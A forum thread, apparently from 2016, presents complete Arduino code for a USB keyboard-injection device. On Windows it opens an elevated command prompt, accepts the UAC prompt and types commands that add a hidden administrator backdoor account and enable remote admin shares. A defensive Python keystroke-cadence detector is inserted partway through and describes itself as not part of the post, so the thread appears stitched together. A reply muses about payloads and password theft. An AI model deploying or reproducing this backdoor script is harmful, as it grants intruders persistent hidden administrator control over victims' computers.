Topic: Simple HID Attack Project (for Windows PCs)

jayxd116

Nov 18, 2016, 06:45 pm Last Edit: Nov 18, 2016, 07:00 pm by jayxd116 Reason: Addendum
Computers almost never perform a check on HIDs connected to the computer, like a mouse, keyboard or joystick, because, as the name Human Interface Device implies, the computer is supposed to take inputs from that device without any questions, since they're direct inputs from the user.

Imagine if your computer wouldn't trust your mouse? "Excuse me Mr. User, I don't think that's a polite gesture you just used; as the operating system I hereby refuse to process your input."

Anyway, so the OS must give unquestioned privilege to HIDs unless it can tell human users from bots. Technically, your computer will accept characters from your keyboard at a rate of more than 1000 wpm (depending on how the device is configured). Though no one has done that before without smashing the keyboard or acquiring mutations that grant superhuman abilities, it's still possible (for a machine, of course) to "type" at those phenomenal speeds.

So, what does this mean? Trust from the OS + High speed character rates + enslavable typist, er.. machine = Hacking opportunities. For this project, I'll be using Windows as the target OS.

This project is intended for educational purposes only; I strongly advise hackers to use this project only on their own computers or on devices they have been given permission to use.


Code:
#include <Keyboard.h>

//For the Arduino DUE, after uploading the code through the Programming port, transfer the cable to
//the Native USB port
//After letting the board run this script on your computer, make sure to delete the hidden user
//through the command line as it will not appear in the Control Panel. I will attach a batch file to
//undo this script

const String BackdoorUsername = "Hidden_User";
const String BackdoorPassword = "password123";

const String myScript[] PROGMEM = { //Type your commands here, one command per line.
                                    
//Example script to create a hidden backdoor in a Windows PC and enable Administrative shares
"net user " + BackdoorUsername + " " + BackdoorPassword + " /add",
"net localgroup Administrators " + BackdoorUsername + " /add",
"net accounts /maxpwage:unlimited",
"REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /v " + BackdoorUsername + " /t REG_DWORD /d 0 /f /reg:64",
"REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f /reg:64"


                                   };

//Don't forget to update this line
const int numLines = 5;

//Append all commands into one line of code each separated with an "&"
String constructCommandString(const String * str_arr, int sz){
  String finalString = "";

  for (int i = 0 ; i < sz - 1; i++){
    finalString += (str_arr[i] + " & ");
  }

  return finalString + str_arr[sz - 1] + " & exit";
}

void hitEnter(){                    // Send Enter
  Keyboard.releaseAll();
  Keyboard.press(0x0A);
  delay(20);
  Keyboard.release(0x0A);
}

void sendCommand(String cmd){       // Send a command to an active console
  Keyboard.releaseAll();
  delay(100);
  Keyboard.print(cmd);
  delay(200);
  hitEnter();
}
/*
void openApp(String app){
  Keyboard.releaseAll();          
  Keyboard.press(KEY_LEFT_GUI);     //
  delay(20);                        //
  Keyboard.press('r');              // Winkey + R to open Run dialog box
  delay(20);                        //
  Keyboard.releaseAll();            //
  delay(100);
  Keyboard.print(app);              // Types in the app filename and Enter
  hitEnter();                       //
}
*/
void openAdminCMD(){ //Works for Windows 8, 8.1 and 10 only
  Keyboard.releaseAll();
  Keyboard.press(KEY_LEFT_GUI);     //
  delay(20);                        //
  Keyboard.press('x');              // Sends a WinKey + X key combination
  delay(20);                        //
  Keyboard.releaseAll();            //
  delay(100);
  
  Keyboard.press('a');              //
  delay(20);                        // Shortcut letter for Administrator CMD
  Keyboard.release('a');            //
  
  delay(3000);                      // Wait until Administrator Prompt shows up

  Keyboard.press(KEY_LEFT_ARROW);   //
  delay(50);                        // Automatically selects Yes
  hitEnter();                       //
}

/*
void exitWindowsApp(){
  Keyboard.press(KEY_LEFT_ALT);     //
  delay(20);                        //
  Keyboard.press(' ');              // ALT + SPACE combination to open Window options
  Keyboard.releaseAll();            //
  delay(50);                        //
  
  Keyboard.press('c');              //
  delay(50);                        // C for close
  Keyboard.release('c');            //
}
*/
void executePWN(){
  //openApp("cmd");                 //
  openAdminCMD();                   // Current script requires an elevated cmd
  
  delay(200);                       // Delays are necessary to avoid typing before the Window appears
  
  sendCommand(constructCommandString(myScript, numLines));
  
  delay(50);
}

void setup() {
  pinMode(LED_BUILTIN, OUTPUT);
  digitalWrite(LED_BUILTIN, LOW);
  
  Keyboard.begin();
  
  delay(1000);
  executePWN();
}

void loop() {
  digitalWrite(LED_BUILTIN, HIGH);
  delay(80);
  digitalWrite(LED_BUILTIN, LOW);
  delay(80);
}


Addendum: Edit the backdoor removal batch file with a text editor according to the username you chose. I used "Power_User" in the script file, replace all occurrences with the username you've chosen.
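A defender-side check that follows from the post's own point: injected keystrokes arrive far faster than any human can type. This is an added example, not code from the post; the keystroke event list is constructed, and the rate ceiling and minimum burst length are assumed values a real input-monitoring agent would tune.

```python
"""Keystroke-cadence heuristic for spotting injected HID input.

Added example, not part of the forum post. Input is a constructed list of
(timestamp_ms, character) events, as a host-side keyboard filter or an
input-logging agent could supply; the thresholds below are assumptions.
"""

# A fast human typist sustains roughly 100 wpm (about 8-10 chars/s), so long
# runs of keystrokes closer than ~40 ms apart are not plausible human input.
MAX_HUMAN_RATE_CPS = 25.0   # assumed ceiling: 25 chars/s (~300 wpm)
MIN_BURST_LEN = 16          # assumed: shorter runs are ignored (key repeat, macros)


def bursts(events, max_human_rate_cps=MAX_HUMAN_RATE_CPS, min_burst_len=MIN_BURST_LEN):
    """Return (start_index, end_index, chars_per_sec) for every run of
    keystrokes delivered faster than a human plausibly could."""
    min_gap_ms = 1000.0 / max_human_rate_cps
    found = []
    run_start = 0
    for i in range(1, len(events) + 1):
        # The current run ends at the last event or where the gap becomes "human".
        gap_ok = i < len(events) and (events[i][0] - events[i - 1][0]) < min_gap_ms
        if not gap_ok:
            run_len = i - run_start
            if run_len >= min_burst_len:
                span_ms = events[i - 1][0] - events[run_start][0]
                rate = (run_len - 1) * 1000.0 / span_ms if span_ms > 0 else float("inf")
                found.append((run_start, i - 1, rate))
            run_start = i
    return found


def injected_text(events, burst):
    """Recover the characters of a flagged burst for an analyst to review."""
    start, end, _ = burst
    return "".join(ch for _, ch in events[start:end + 1])


def build_sample():
    """Constructed sample: a human typing 'hello world' at ~120 ms per key,
    then a device typing the post's 'net user' command at 4 ms per key."""
    events, t = [], 0
    for ch in "hello world":
        events.append((t, ch))
        t += 120
    t += 2000
    for ch in "net user Hidden_User password123 /add":
        events.append((t, ch))
        t += 4
    return events


if __name__ == "__main__":
    sample = build_sample()
    for b in bursts(sample):
        print(f"burst at events {b[0]}-{b[1]}, {b[2]:.0f} chars/s: {injected_text(sample, b)!r}")
```

On the constructed sample the human run is never flagged and the device run is reported as one burst at 250 chars/s, so a monitoring agent could lock the session or detach the device before the command completes.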

xl97

nice project.

however this has been done many times before..  (but a nice twist on the account creation)

There are MANY variants of the RubberDucky project...

I myself made one not too long ago that also adds in an ESP8266 module (acting as a captive portal) to serve up my GUI page so I can execute (whatever pre-made actions) remotely from cell phone/tablet..etc..

We used it to play a joke on a fellow co-worker..

sending text and moving his mouse all remotely through the ESP >> Pro-Micro  >> PC  toolchain


but could have easily reached out to the internet and executed a (malicious) payload if desired... or grabbed any number of protected/password files and sent them to a remote location for cracking later on...etc..etc.